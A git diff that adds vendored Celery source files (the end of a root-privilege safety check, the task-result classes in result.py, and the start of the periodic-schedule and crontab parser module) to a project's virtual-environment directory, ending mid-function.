gid_grp_name = gid_entry[0] + egid_grp_name = egid_entry[0] + + # Create lists to use in validation step later. + gids_in_use = (gid_grp_name, egid_grp_name) + groups_with_security_risk = ('sudo', 'wheel') + + is_root = uid == 0 or euid == 0 + # Confirm that the gid and egid are not one that + # can be used to escalate privileges. + if is_root or any(group in gids_in_use + for group in groups_with_security_risk): + _warn_or_raise_security_error(egid, euid, gid, uid, + pickle_or_serialize) + + +def _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize): + c_force_root = os.environ.get('C_FORCE_ROOT', False) + + if pickle_or_serialize and not c_force_root: + raise SecurityError(ROOT_DISALLOWED.format( + uid=uid, euid=euid, gid=gid, egid=egid, + )) + + warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format( + uid=uid, euid=euid, gid=gid, egid=egid, + ))) diff --git a/env/Lib/site-packages/celery/result.py b/env/Lib/site-packages/celery/result.py new file mode 100644 index 00000000..0c9e0a30 --- /dev/null +++ b/env/Lib/site-packages/celery/result.py @@ -0,0 +1,1087 @@ +"""Task results/state and results for groups of tasks.""" + +import datetime +import time +from collections import deque +from contextlib import contextmanager +from weakref import proxy + +from kombu.utils.objects import cached_property +from vine import Thenable, barrier, promise + +from . import current_app, states +from ._state import _set_task_join_will_block, task_join_will_block +from .app import app_or_default +from .exceptions import ImproperlyConfigured, IncompleteStream, TimeoutError +from .utils.graph import DependencyGraph, GraphFormatter + +try: + import tblib +except ImportError: + tblib = None + +__all__ = ( + 'ResultBase', 'AsyncResult', 'ResultSet', + 'GroupResult', 'EagerResult', 'result_from_tuple', +) + +E_WOULDBLOCK = """\ +Never call result.get() within a task! +See https://docs.celeryq.dev/en/latest/userguide/tasks.html\ +#avoid-launching-synchronous-subtasks +""" + + +def assert_will_not_block(): + if task_join_will_block(): + raise RuntimeError(E_WOULDBLOCK) + + +@contextmanager +def allow_join_result(): + reset_value = task_join_will_block() + _set_task_join_will_block(False) + try: + yield + finally: + _set_task_join_will_block(reset_value) + + +@contextmanager +def denied_join_result(): + reset_value = task_join_will_block() + _set_task_join_will_block(True) + try: + yield + finally: + _set_task_join_will_block(reset_value) + + +class ResultBase: + """Base class for results.""" + + #: Parent result (if part of a chain) + parent = None + + +@Thenable.register +class AsyncResult(ResultBase): + """Query task state. + + Arguments: + id (str): See :attr:`id`. + backend (Backend): See :attr:`backend`. + """ + + app = None + + #: Error raised for timeouts. + TimeoutError = TimeoutError + + #: The task's UUID. + id = None + + #: The task result backend to use. + backend = None + + def __init__(self, id, backend=None, + task_name=None, # deprecated + app=None, parent=None): + if id is None: + raise ValueError( + f'AsyncResult requires valid id, not {type(id)}') + self.app = app_or_default(app or self.app) + self.id = id + self.backend = backend or self.app.backend + self.parent = parent + self.on_ready = promise(self._on_fulfilled, weak=True) + self._cache = None + self._ignored = False + + @property + def ignored(self): + """If True, task result retrieval is disabled.""" + if hasattr(self, '_ignored'): + return self._ignored + return False + + @ignored.setter + def ignored(self, value): + """Enable/disable task result retrieval.""" + self._ignored = value + + def then(self, callback, on_error=None, weak=False): + self.backend.add_pending_result(self, weak=weak) + return self.on_ready.then(callback, on_error) + + def _on_fulfilled(self, result): + self.backend.remove_pending_result(self) + return result + + def as_tuple(self): + parent = self.parent + return (self.id, parent and parent.as_tuple()), None + + def as_list(self): + """Return as a list of task IDs.""" + results = [] + parent = self.parent + results.append(self.id) + if parent is not None: + results.extend(parent.as_list()) + return results + + def forget(self): + """Forget the result of this task and its parents.""" + self._cache = None + if self.parent: + self.parent.forget() + self.backend.forget(self.id) + + def revoke(self, connection=None, terminate=False, signal=None, + wait=False, timeout=None): + """Send revoke signal to all workers. + + Any worker receiving the task, or having reserved the + task, *must* ignore it. + + Arguments: + terminate (bool): Also terminate the process currently working + on the task (if any). + signal (str): Name of signal to send to process if terminate. + Default is TERM. + wait (bool): Wait for replies from workers. + The ``timeout`` argument specifies the seconds to wait. + Disabled by default. + timeout (float): Time in seconds to wait for replies when + ``wait`` is enabled. + """ + self.app.control.revoke(self.id, connection=connection, + terminate=terminate, signal=signal, + reply=wait, timeout=timeout) + + def revoke_by_stamped_headers(self, headers, connection=None, terminate=False, signal=None, + wait=False, timeout=None): + """Send revoke signal to all workers only for tasks with matching headers values. + + Any worker receiving the task, or having reserved the + task, *must* ignore it. + All header fields *must* match. + + Arguments: + headers (dict[str, Union(str, list)]): Headers to match when revoking tasks. + terminate (bool): Also terminate the process currently working + on the task (if any). + signal (str): Name of signal to send to process if terminate. + Default is TERM. + wait (bool): Wait for replies from workers. + The ``timeout`` argument specifies the seconds to wait. + Disabled by default. + timeout (float): Time in seconds to wait for replies when + ``wait`` is enabled. + """ + self.app.control.revoke_by_stamped_headers(headers, connection=connection, + terminate=terminate, signal=signal, + reply=wait, timeout=timeout) + + def get(self, timeout=None, propagate=True, interval=0.5, + no_ack=True, follow_parents=True, callback=None, on_message=None, + on_interval=None, disable_sync_subtasks=True, + EXCEPTION_STATES=states.EXCEPTION_STATES, + PROPAGATE_STATES=states.PROPAGATE_STATES): + """Wait until task is ready, and return its result. + + Warning: + Waiting for tasks within a task may lead to deadlocks. + Please read :ref:`task-synchronous-subtasks`. + + Warning: + Backends use resources to store and transmit results. To ensure + that resources are released, you must eventually call + :meth:`~@AsyncResult.get` or :meth:`~@AsyncResult.forget` on + EVERY :class:`~@AsyncResult` instance returned after calling + a task. + + Arguments: + timeout (float): How long to wait, in seconds, before the + operation times out. This is the setting for the publisher + (celery client) and is different from `timeout` parameter of + `@app.task`, which is the setting for the worker. The task + isn't terminated even if timeout occurs. + propagate (bool): Re-raise exception if the task failed. + interval (float): Time to wait (in seconds) before retrying to + retrieve the result. Note that this does not have any effect + when using the RPC/redis result store backends, as they don't + use polling. + no_ack (bool): Enable amqp no ack (automatically acknowledge + message). If this is :const:`False` then the message will + **not be acked**. + follow_parents (bool): Re-raise any exception raised by + parent tasks. + disable_sync_subtasks (bool): Disable tasks to wait for sub tasks + this is the default configuration. CAUTION do not enable this + unless you must. + + Raises: + celery.exceptions.TimeoutError: if `timeout` isn't + :const:`None` and the result does not arrive within + `timeout` seconds. + Exception: If the remote call raised an exception then that + exception will be re-raised in the caller process. + """ + if self.ignored: + return + + if disable_sync_subtasks: + assert_will_not_block() + _on_interval = promise() + if follow_parents and propagate and self.parent: + _on_interval = promise(self._maybe_reraise_parent_error, weak=True) + self._maybe_reraise_parent_error() + if on_interval: + _on_interval.then(on_interval) + + if self._cache: + if propagate: + self.maybe_throw(callback=callback) + return self.result + + self.backend.add_pending_result(self) + return self.backend.wait_for_pending( + self, timeout=timeout, + interval=interval, + on_interval=_on_interval, + no_ack=no_ack, + propagate=propagate, + callback=callback, + on_message=on_message, + ) + wait = get # deprecated alias to :meth:`get`. + + def _maybe_reraise_parent_error(self): + for node in reversed(list(self._parents())): + node.maybe_throw() + + def _parents(self): + node = self.parent + while node: + yield node + node = node.parent + + def collect(self, intermediate=False, **kwargs): + """Collect results as they return. + + Iterator, like :meth:`get` will wait for the task to complete, + but will also follow :class:`AsyncResult` and :class:`ResultSet` + returned by the task, yielding ``(result, value)`` tuples for each + result in the tree. + + An example would be having the following tasks: + + .. code-block:: python + + from celery import group + from proj.celery import app + + @app.task(trail=True) + def A(how_many): + return group(B.s(i) for i in range(how_many))() + + @app.task(trail=True) + def B(i): + return pow2.delay(i) + + @app.task(trail=True) + def pow2(i): + return i ** 2 + + .. code-block:: pycon + + >>> from celery.result import ResultBase + >>> from proj.tasks import A + + >>> result = A.delay(10) + >>> [v for v in result.collect() + ... if not isinstance(v, (ResultBase, tuple))] + [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] + + Note: + The ``Task.trail`` option must be enabled + so that the list of children is stored in ``result.children``. + This is the default but enabled explicitly for illustration. + + Yields: + Tuple[AsyncResult, Any]: tuples containing the result instance + of the child task, and the return value of that task. + """ + for _, R in self.iterdeps(intermediate=intermediate): + yield R, R.get(**kwargs) + + def get_leaf(self): + value = None + for _, R in self.iterdeps(): + value = R.get() + return value + + def iterdeps(self, intermediate=False): + stack = deque([(None, self)]) + + is_incomplete_stream = not intermediate + + while stack: + parent, node = stack.popleft() + yield parent, node + if node.ready(): + stack.extend((node, child) for child in node.children or []) + else: + if is_incomplete_stream: + raise IncompleteStream() + + def ready(self): + """Return :const:`True` if the task has executed. + + If the task is still running, pending, or is waiting + for retry then :const:`False` is returned. + """ + return self.state in self.backend.READY_STATES + + def successful(self): + """Return :const:`True` if the task executed successfully.""" + return self.state == states.SUCCESS + + def failed(self): + """Return :const:`True` if the task failed.""" + return self.state == states.FAILURE + + def throw(self, *args, **kwargs): + self.on_ready.throw(*args, **kwargs) + + def maybe_throw(self, propagate=True, callback=None): + cache = self._get_task_meta() if self._cache is None else self._cache + state, value, tb = ( + cache['status'], cache['result'], cache.get('traceback')) + if state in states.PROPAGATE_STATES and propagate: + self.throw(value, self._to_remote_traceback(tb)) + if callback is not None: + callback(self.id, value) + return value + maybe_reraise = maybe_throw # XXX compat alias + + def _to_remote_traceback(self, tb): + if tb and tblib is not None and self.app.conf.task_remote_tracebacks: + return tblib.Traceback.from_string(tb).as_traceback() + + def build_graph(self, intermediate=False, formatter=None): + graph = DependencyGraph( + formatter=formatter or GraphFormatter(root=self.id, shape='oval'), + ) + for parent, node in self.iterdeps(intermediate=intermediate): + graph.add_arc(node) + if parent: + graph.add_edge(parent, node) + return graph + + def __str__(self): + """`str(self) -> self.id`.""" + return str(self.id) + + def __hash__(self): + """`hash(self) -> hash(self.id)`.""" + return hash(self.id) + + def __repr__(self): + return f'<{type(self).__name__}: {self.id}>' + + def __eq__(self, other): + if isinstance(other, AsyncResult): + return other.id == self.id + elif isinstance(other, str): + return other == self.id + return NotImplemented + + def __copy__(self): + return self.__class__( + self.id, self.backend, None, self.app, self.parent, + ) + + def __reduce__(self): + return self.__class__, self.__reduce_args__() + + def __reduce_args__(self): + return self.id, self.backend, None, None, self.parent + + def __del__(self): + """Cancel pending operations when the instance is destroyed.""" + if self.backend is not None: + self.backend.remove_pending_result(self) + + @cached_property + def graph(self): + return self.build_graph() + + @property + def supports_native_join(self): + return self.backend.supports_native_join + + @property + def children(self): + return self._get_task_meta().get('children') + + def _maybe_set_cache(self, meta): + if meta: + state = meta['status'] + if state in states.READY_STATES: + d = self._set_cache(self.backend.meta_from_decoded(meta)) + self.on_ready(self) + return d + return meta + + def _get_task_meta(self): + if self._cache is None: + return self._maybe_set_cache(self.backend.get_task_meta(self.id)) + return self._cache + + def _iter_meta(self, **kwargs): + return iter([self._get_task_meta()]) + + def _set_cache(self, d): + children = d.get('children') + if children: + d['children'] = [ + result_from_tuple(child, self.app) for child in children + ] + self._cache = d + return d + + @property + def result(self): + """Task return value. + + Note: + When the task has been executed, this contains the return value. + If the task raised an exception, this will be the exception + instance. + """ + return self._get_task_meta()['result'] + info = result + + @property + def traceback(self): + """Get the traceback of a failed task.""" + return self._get_task_meta().get('traceback') + + @property + def state(self): + """The tasks current state. + + Possible values includes: + + *PENDING* + + The task is waiting for execution. + + *STARTED* + + The task has been started. + + *RETRY* + + The task is to be retried, possibly because of failure. + + *FAILURE* + + The task raised an exception, or has exceeded the retry limit. + The :attr:`result` attribute then contains the + exception raised by the task. + + *SUCCESS* + + The task executed successfully. The :attr:`result` attribute + then contains the tasks return value. + """ + return self._get_task_meta()['status'] + status = state # XXX compat + + @property + def task_id(self): + """Compat. alias to :attr:`id`.""" + return self.id + + @task_id.setter + def task_id(self, id): + self.id = id + + @property + def name(self): + return self._get_task_meta().get('name') + + @property + def args(self): + return self._get_task_meta().get('args') + + @property + def kwargs(self): + return self._get_task_meta().get('kwargs') + + @property + def worker(self): + return self._get_task_meta().get('worker') + + @property + def date_done(self): + """UTC date and time.""" + date_done = self._get_task_meta().get('date_done') + if date_done and not isinstance(date_done, datetime.datetime): + return datetime.datetime.fromisoformat(date_done) + return date_done + + @property + def retries(self): + return self._get_task_meta().get('retries') + + @property + def queue(self): + return self._get_task_meta().get('queue') + + +@Thenable.register +class ResultSet(ResultBase): + """A collection of results. + + Arguments: + results (Sequence[AsyncResult]): List of result instances. + """ + + _app = None + + #: List of results in in the set. + results = None + + def __init__(self, results, app=None, ready_barrier=None, **kwargs): + self._app = app + self.results = results + self.on_ready = promise(args=(proxy(self),)) + self._on_full = ready_barrier or barrier(results) + if self._on_full: + self._on_full.then(promise(self._on_ready, weak=True)) + + def add(self, result): + """Add :class:`AsyncResult` as a new member of the set. + + Does nothing if the result is already a member. + """ + if result not in self.results: + self.results.append(result) + if self._on_full: + self._on_full.add(result) + + def _on_ready(self): + if self.backend.is_async: + self.on_ready() + + def remove(self, result): + """Remove result from the set; it must be a member. + + Raises: + KeyError: if the result isn't a member. + """ + if isinstance(result, str): + result = self.app.AsyncResult(result) + try: + self.results.remove(result) + except ValueError: + raise KeyError(result) + + def discard(self, result): + """Remove result from the set if it is a member. + + Does nothing if it's not a member. + """ + try: + self.remove(result) + except KeyError: + pass + + def update(self, results): + """Extend from iterable of results.""" + self.results.extend(r for r in results if r not in self.results) + + def clear(self): + """Remove all results from this set.""" + self.results[:] = [] # don't create new list. + + def successful(self): + """Return true if all tasks successful. + + Returns: + bool: true if all of the tasks finished + successfully (i.e. didn't raise an exception). + """ + return all(result.successful() for result in self.results) + + def failed(self): + """Return true if any of the tasks failed. + + Returns: + bool: true if one of the tasks failed. + (i.e., raised an exception) + """ + return any(result.failed() for result in self.results) + + def maybe_throw(self, callback=None, propagate=True): + for result in self.results: + result.maybe_throw(callback=callback, propagate=propagate) + maybe_reraise = maybe_throw # XXX compat alias. + + def waiting(self): + """Return true if any of the tasks are incomplete. + + Returns: + bool: true if one of the tasks are still + waiting for execution. + """ + return any(not result.ready() for result in self.results) + + def ready(self): + """Did all of the tasks complete? (either by success of failure). + + Returns: + bool: true if all of the tasks have been executed. + """ + return all(result.ready() for result in self.results) + + def completed_count(self): + """Task completion count. + + Note that `complete` means `successful` in this context. In other words, the + return value of this method is the number of ``successful`` tasks. + + Returns: + int: the number of complete (i.e. successful) tasks. + """ + return sum(int(result.successful()) for result in self.results) + + def forget(self): + """Forget about (and possible remove the result of) all the tasks.""" + for result in self.results: + result.forget() + + def revoke(self, connection=None, terminate=False, signal=None, + wait=False, timeout=None): + """Send revoke signal to all workers for all tasks in the set. + + Arguments: + terminate (bool): Also terminate the process currently working + on the task (if any). + signal (str): Name of signal to send to process if terminate. + Default is TERM. + wait (bool): Wait for replies from worker. + The ``timeout`` argument specifies the number of seconds + to wait. Disabled by default. + timeout (float): Time in seconds to wait for replies when + the ``wait`` argument is enabled. + """ + self.app.control.revoke([r.id for r in self.results], + connection=connection, timeout=timeout, + terminate=terminate, signal=signal, reply=wait) + + def __iter__(self): + return iter(self.results) + + def __getitem__(self, index): + """`res[i] -> res.results[i]`.""" + return self.results[index] + + def get(self, timeout=None, propagate=True, interval=0.5, + callback=None, no_ack=True, on_message=None, + disable_sync_subtasks=True, on_interval=None): + """See :meth:`join`. + + This is here for API compatibility with :class:`AsyncResult`, + in addition it uses :meth:`join_native` if available for the + current result backend. + """ + return (self.join_native if self.supports_native_join else self.join)( + timeout=timeout, propagate=propagate, + interval=interval, callback=callback, no_ack=no_ack, + on_message=on_message, disable_sync_subtasks=disable_sync_subtasks, + on_interval=on_interval, + ) + + def join(self, timeout=None, propagate=True, interval=0.5, + callback=None, no_ack=True, on_message=None, + disable_sync_subtasks=True, on_interval=None): + """Gather the results of all tasks as a list in order. + + Note: + This can be an expensive operation for result store + backends that must resort to polling (e.g., database). + + You should consider using :meth:`join_native` if your backend + supports it. + + Warning: + Waiting for tasks within a task may lead to deadlocks. + Please see :ref:`task-synchronous-subtasks`. + + Arguments: + timeout (float): The number of seconds to wait for results + before the operation times out. + propagate (bool): If any of the tasks raises an exception, + the exception will be re-raised when this flag is set. + interval (float): Time to wait (in seconds) before retrying to + retrieve a result from the set. Note that this does not have + any effect when using the amqp result store backend, + as it does not use polling. + callback (Callable): Optional callback to be called for every + result received. Must have signature ``(task_id, value)`` + No results will be returned by this function if a callback + is specified. The order of results is also arbitrary when a + callback is used. To get access to the result object for + a particular id you'll have to generate an index first: + ``index = {r.id: r for r in gres.results.values()}`` + Or you can create new result objects on the fly: + ``result = app.AsyncResult(task_id)`` (both will + take advantage of the backend cache anyway). + no_ack (bool): Automatic message acknowledgment (Note that if this + is set to :const:`False` then the messages + *will not be acknowledged*). + disable_sync_subtasks (bool): Disable tasks to wait for sub tasks + this is the default configuration. CAUTION do not enable this + unless you must. + + Raises: + celery.exceptions.TimeoutError: if ``timeout`` isn't + :const:`None` and the operation takes longer than ``timeout`` + seconds. + """ + if disable_sync_subtasks: + assert_will_not_block() + time_start = time.monotonic() + remaining = None + + if on_message is not None: + raise ImproperlyConfigured( + 'Backend does not support on_message callback') + + results = [] + for result in self.results: + remaining = None + if timeout: + remaining = timeout - (time.monotonic() - time_start) + if remaining <= 0.0: + raise TimeoutError('join operation timed out') + value = result.get( + timeout=remaining, propagate=propagate, + interval=interval, no_ack=no_ack, on_interval=on_interval, + disable_sync_subtasks=disable_sync_subtasks, + ) + if callback: + callback(result.id, value) + else: + results.append(value) + return results + + def then(self, callback, on_error=None, weak=False): + return self.on_ready.then(callback, on_error) + + def iter_native(self, timeout=None, interval=0.5, no_ack=True, + on_message=None, on_interval=None): + """Backend optimized version of :meth:`iterate`. + + .. versionadded:: 2.2 + + Note that this does not support collecting the results + for different task types using different backends. + + This is currently only supported by the amqp, Redis and cache + result backends. + """ + return self.backend.iter_native( + self, + timeout=timeout, interval=interval, no_ack=no_ack, + on_message=on_message, on_interval=on_interval, + ) + + def join_native(self, timeout=None, propagate=True, + interval=0.5, callback=None, no_ack=True, + on_message=None, on_interval=None, + disable_sync_subtasks=True): + """Backend optimized version of :meth:`join`. + + .. versionadded:: 2.2 + + Note that this does not support collecting the results + for different task types using different backends. + + This is currently only supported by the amqp, Redis and cache + result backends. + """ + if disable_sync_subtasks: + assert_will_not_block() + order_index = None if callback else { + result.id: i for i, result in enumerate(self.results) + } + acc = None if callback else [None for _ in range(len(self))] + for task_id, meta in self.iter_native(timeout, interval, no_ack, + on_message, on_interval): + if isinstance(meta, list): + value = [] + for children_result in meta: + value.append(children_result.get()) + else: + value = meta['result'] + if propagate and meta['status'] in states.PROPAGATE_STATES: + raise value + if callback: + callback(task_id, value) + else: + acc[order_index[task_id]] = value + return acc + + def _iter_meta(self, **kwargs): + return (meta for _, meta in self.backend.get_many( + {r.id for r in self.results}, max_iterations=1, **kwargs + )) + + def _failed_join_report(self): + return (res for res in self.results + if res.backend.is_cached(res.id) and + res.state in states.PROPAGATE_STATES) + + def __len__(self): + return len(self.results) + + def __eq__(self, other): + if isinstance(other, ResultSet): + return other.results == self.results + return NotImplemented + + def __repr__(self): + return f'<{type(self).__name__}: [{", ".join(r.id for r in self.results)}]>' + + @property + def supports_native_join(self): + try: + return self.results[0].supports_native_join + except IndexError: + pass + + @property + def app(self): + if self._app is None: + self._app = (self.results[0].app if self.results else + current_app._get_current_object()) + return self._app + + @app.setter + def app(self, app): + self._app = app + + @property + def backend(self): + return self.app.backend if self.app else self.results[0].backend + + +@Thenable.register +class GroupResult(ResultSet): + """Like :class:`ResultSet`, but with an associated id. + + This type is returned by :class:`~celery.group`. + + It enables inspection of the tasks state and return values as + a single entity. + + Arguments: + id (str): The id of the group. + results (Sequence[AsyncResult]): List of result instances. + parent (ResultBase): Parent result of this group. + """ + + #: The UUID of the group. + id = None + + #: List/iterator of results in the group + results = None + + def __init__(self, id=None, results=None, parent=None, **kwargs): + self.id = id + self.parent = parent + super().__init__(results, **kwargs) + + def _on_ready(self): + self.backend.remove_pending_result(self) + super()._on_ready() + + def save(self, backend=None): + """Save group-result for later retrieval using :meth:`restore`. + + Example: + >>> def save_and_restore(result): + ... result.save() + ... result = GroupResult.restore(result.id) + """ + return (backend or self.app.backend).save_group(self.id, self) + + def delete(self, backend=None): + """Remove this result if it was previously saved.""" + (backend or self.app.backend).delete_group(self.id) + + def __reduce__(self): + return self.__class__, self.__reduce_args__() + + def __reduce_args__(self): + return self.id, self.results + + def __bool__(self): + return bool(self.id or self.results) + __nonzero__ = __bool__ # Included for Py2 backwards compatibility + + def __eq__(self, other): + if isinstance(other, GroupResult): + return ( + other.id == self.id and + other.results == self.results and + other.parent == self.parent + ) + elif isinstance(other, str): + return other == self.id + return NotImplemented + + def __repr__(self): + return f'<{type(self).__name__}: {self.id} [{", ".join(r.id for r in self.results)}]>' + + def __str__(self): + """`str(self) -> self.id`.""" + return str(self.id) + + def __hash__(self): + """`hash(self) -> hash(self.id)`.""" + return hash(self.id) + + def as_tuple(self): + return ( + (self.id, self.parent and self.parent.as_tuple()), + [r.as_tuple() for r in self.results] + ) + + @property + def children(self): + return self.results + + @classmethod + def restore(cls, id, backend=None, app=None): + """Restore previously saved group result.""" + app = app or ( + cls.app if not isinstance(cls.app, property) else current_app + ) + backend = backend or app.backend + return backend.restore_group(id) + + +@Thenable.register +class EagerResult(AsyncResult): + """Result that we know has already been executed.""" + + def __init__(self, id, ret_value, state, traceback=None): + # pylint: disable=super-init-not-called + # XXX should really not be inheriting from AsyncResult + self.id = id + self._result = ret_value + self._state = state + self._traceback = traceback + self.on_ready = promise() + self.on_ready(self) + + def then(self, callback, on_error=None, weak=False): + return self.on_ready.then(callback, on_error) + + def _get_task_meta(self): + return self._cache + + def __reduce__(self): + return self.__class__, self.__reduce_args__() + + def __reduce_args__(self): + return (self.id, self._result, self._state, self._traceback) + + def __copy__(self): + cls, args = self.__reduce__() + return cls(*args) + + def ready(self): + return True + + def get(self, timeout=None, propagate=True, + disable_sync_subtasks=True, **kwargs): + if disable_sync_subtasks: + assert_will_not_block() + + if self.successful(): + return self.result + elif self.state in states.PROPAGATE_STATES: + if propagate: + raise self.result if isinstance( + self.result, Exception) else Exception(self.result) + return self.result + wait = get # XXX Compat (remove 5.0) + + def forget(self): + pass + + def revoke(self, *args, **kwargs): + self._state = states.REVOKED + + def __repr__(self): + return f'' + + @property + def _cache(self): + return { + 'task_id': self.id, + 'result': self._result, + 'status': self._state, + 'traceback': self._traceback, + } + + @property + def result(self): + """The tasks return value.""" + return self._result + + @property + def state(self): + """The tasks state.""" + return self._state + status = state + + @property + def traceback(self): + """The traceback if the task failed.""" + return self._traceback + + @property + def supports_native_join(self): + return False + + +def result_from_tuple(r, app=None): + """Deserialize result from tuple.""" + # earlier backends may just pickle, so check if + # result is already prepared. + app = app_or_default(app) + Result = app.AsyncResult + if not isinstance(r, ResultBase): + res, nodes = r + id, parent = res if isinstance(res, (list, tuple)) else (res, None) + if parent: + parent = result_from_tuple(parent, app) + + if nodes is not None: + return app.GroupResult( + id, [result_from_tuple(child, app) for child in nodes], + parent=parent, + ) + + return Result(id, parent=parent) + return r diff --git a/env/Lib/site-packages/celery/schedules.py b/env/Lib/site-packages/celery/schedules.py new file mode 100644 index 00000000..b35436ae --- /dev/null +++ b/env/Lib/site-packages/celery/schedules.py @@ -0,0 +1,865 @@ +"""Schedules define the intervals at which periodic tasks run.""" +from __future__ import annotations + +import re +from bisect import bisect, bisect_left +from collections import namedtuple +from collections.abc import Iterable +from datetime import datetime, timedelta, tzinfo +from typing import Any, Callable, Mapping, Sequence + +from kombu.utils.objects import cached_property + +from celery import Celery + +from . import current_app +from .utils.collections import AttributeDict +from .utils.time import (ffwd, humanize_seconds, localize, maybe_make_aware, maybe_timedelta, remaining, timezone, + weekday) + +__all__ = ( + 'ParseException', 'schedule', 'crontab', 'crontab_parser', + 'maybe_schedule', 'solar', +) + +schedstate = namedtuple('schedstate', ('is_due', 'next')) + +CRON_PATTERN_INVALID = """\ +Invalid crontab pattern. Valid range is {min}-{max}. \ +'{value}' was found.\ +""" + +CRON_INVALID_TYPE = """\ +Argument cronspec needs to be of any of the following types: \ +int, str, or an iterable type. {type!r} was given.\ +""" + +CRON_REPR = """\ +\ +""" + +SOLAR_INVALID_LATITUDE = """\ +Argument latitude {lat} is invalid, must be between -90 and 90.\ +""" + +SOLAR_INVALID_LONGITUDE = """\ +Argument longitude {lon} is invalid, must be between -180 and 180.\ +""" + +SOLAR_INVALID_EVENT = """\ +Argument event "{event}" is invalid, must be one of {all_events}.\ +""" + + +def cronfield(s: str) -> str: + return '*' if s is None else s + + +class ParseException(Exception): + """Raised by :class:`crontab_parser` when the input can't be parsed.""" + + +class BaseSchedule: + + def __init__(self, nowfun: Callable | None = None, app: Celery | None = None): + self.nowfun = nowfun + self._app = app + + def now(self) -> datetime: + return (self.nowfun or self.app.now)() + + def remaining_estimate(self, last_run_at: datetime) -> timedelta: + raise NotImplementedError() + + def is_due(self, last_run_at: datetime) -> tuple[bool, datetime]: + raise NotImplementedError() + + def maybe_make_aware( + self, dt: datetime, naive_as_utc: bool = True) -> datetime: + return maybe_make_aware(dt, self.tz, naive_as_utc=naive_as_utc) + + @property + def app(self) -> Celery: + return self._app or current_app._get_current_object() + + @app.setter + def app(self, app: Celery) -> None: + self._app = app + + @cached_property + def tz(self) -> tzinfo: + return self.app.timezone + + @cached_property + def utc_enabled(self) -> bool: + return self.app.conf.enable_utc + + def to_local(self, dt: datetime) -> datetime: + if not self.utc_enabled: + return timezone.to_local_fallback(dt) + return dt + + def __eq__(self, other: Any) -> bool: + if isinstance(other, BaseSchedule): + return other.nowfun == self.nowfun + return NotImplemented + + +class schedule(BaseSchedule): + """Schedule for periodic task. + + Arguments: + run_every (float, ~datetime.timedelta): Time interval. + relative (bool): If set to True the run time will be rounded to the + resolution of the interval. + nowfun (Callable): Function returning the current date and time + (:class:`~datetime.datetime`). + app (Celery): Celery app instance. + """ + + relative: bool = False + + def __init__(self, run_every: float | timedelta | None = None, + relative: bool = False, nowfun: Callable | None = None, app: Celery + | None = None) -> None: + self.run_every = maybe_timedelta(run_every) + self.relative = relative + super().__init__(nowfun=nowfun, app=app) + + def remaining_estimate(self, last_run_at: datetime) -> timedelta: + return remaining( + self.maybe_make_aware(last_run_at), self.run_every, + self.maybe_make_aware(self.now()), self.relative, + ) + + def is_due(self, last_run_at: datetime) -> tuple[bool, datetime]: + """Return tuple of ``(is_due, next_time_to_check)``. + + Notes: + - next time to check is in seconds. + + - ``(True, 20)``, means the task should be run now, and the next + time to check is in 20 seconds. + + - ``(False, 12.3)``, means the task is not due, but that the + scheduler should check again in 12.3 seconds. + + The next time to check is used to save energy/CPU cycles, + it does not need to be accurate but will influence the precision + of your schedule. You must also keep in mind + the value of :setting:`beat_max_loop_interval`, + that decides the maximum number of seconds the scheduler can + sleep between re-checking the periodic task intervals. So if you + have a task that changes schedule at run-time then your next_run_at + check will decide how long it will take before a change to the + schedule takes effect. The max loop interval takes precedence + over the next check at value returned. + + .. admonition:: Scheduler max interval variance + + The default max loop interval may vary for different schedulers. + For the default scheduler the value is 5 minutes, but for example + the :pypi:`django-celery-beat` database scheduler the value + is 5 seconds. + """ + last_run_at = self.maybe_make_aware(last_run_at) + rem_delta = self.remaining_estimate(last_run_at) + remaining_s = max(rem_delta.total_seconds(), 0) + if remaining_s == 0: + return schedstate(is_due=True, next=self.seconds) + return schedstate(is_due=False, next=remaining_s) + + def __repr__(self) -> str: + return f'' + + def __eq__(self, other: Any) -> bool: + if isinstance(other, schedule): + return self.run_every == other.run_every + return self.run_every == other + + def __reduce__(self) -> tuple[type, + tuple[timedelta, bool, Callable | None]]: + return self.__class__, (self.run_every, self.relative, self.nowfun) + + @property + def seconds(self) -> int | float: + return max(self.run_every.total_seconds(), 0) + + @property + def human_seconds(self) -> str: + return humanize_seconds(self.seconds) + + +class crontab_parser: + """Parser for Crontab expressions. + + Any expression of the form 'groups' + (see BNF grammar below) is accepted and expanded to a set of numbers. + These numbers represent the units of time that the Crontab needs to + run on: + + .. code-block:: bnf + + digit :: '0'..'9' + dow :: 'a'..'z' + number :: digit+ | dow+ + steps :: number + range :: number ( '-' number ) ? + numspec :: '*' | range + expr :: numspec ( '/' steps ) ? + groups :: expr ( ',' expr ) * + + The parser is a general purpose one, useful for parsing hours, minutes and + day of week expressions. Example usage: + + .. code-block:: pycon + + >>> minutes = crontab_parser(60).parse('*/15') + [0, 15, 30, 45] + >>> hours = crontab_parser(24).parse('*/4') + [0, 4, 8, 12, 16, 20] + >>> day_of_week = crontab_parser(7).parse('*') + [0, 1, 2, 3, 4, 5, 6] + + It can also parse day of month and month of year expressions if initialized + with a minimum of 1. Example usage: + + .. code-block:: pycon + + >>> days_of_month = crontab_parser(31, 1).parse('*/3') + [1, 4, 7, 10, 13, 16, 19, 22, 25, 28, 31] + >>> months_of_year = crontab_parser(12, 1).parse('*/2') + [1, 3, 5, 7, 9, 11] + >>> months_of_year = crontab_parser(12, 1).parse('2-12/2') + [2, 4, 6, 8, 10, 12] + + The maximum possible expanded value returned is found by the formula: + + :math:`max_ + min_ - 1` + """ + + ParseException = ParseException + + _range = r'(\w+?)-(\w+)' + _steps = r'/(\w+)?' + _star = r'\*' + + def __init__(self, max_: int = 60, min_: int = 0): + self.max_ = max_ + self.min_ = min_ + self.pats: tuple[tuple[re.Pattern, Callable], ...] = ( + (re.compile(self._range + self._steps), self._range_steps), + (re.compile(self._range), self._expand_range), + (re.compile(self._star + self._steps), self._star_steps), + (re.compile('^' + self._star + '$'), self._expand_star), + ) + + def parse(self, spec: str) -> set[int]: + acc = set() + for part in spec.split(','): + if not part: + raise self.ParseException('empty part') + acc |= set(self._parse_part(part)) + return acc + + def _parse_part(self, part: str) -> list[int]: + for regex, handler in self.pats: + m = regex.match(part) + if m: + return handler(m.groups()) + return self._expand_range((part,)) + + def _expand_range(self, toks: Sequence[str]) -> list[int]: + fr = self._expand_number(toks[0]) + if len(toks) > 1: + to = self._expand_number(toks[1]) + if to < fr: # Wrap around max_ if necessary + return 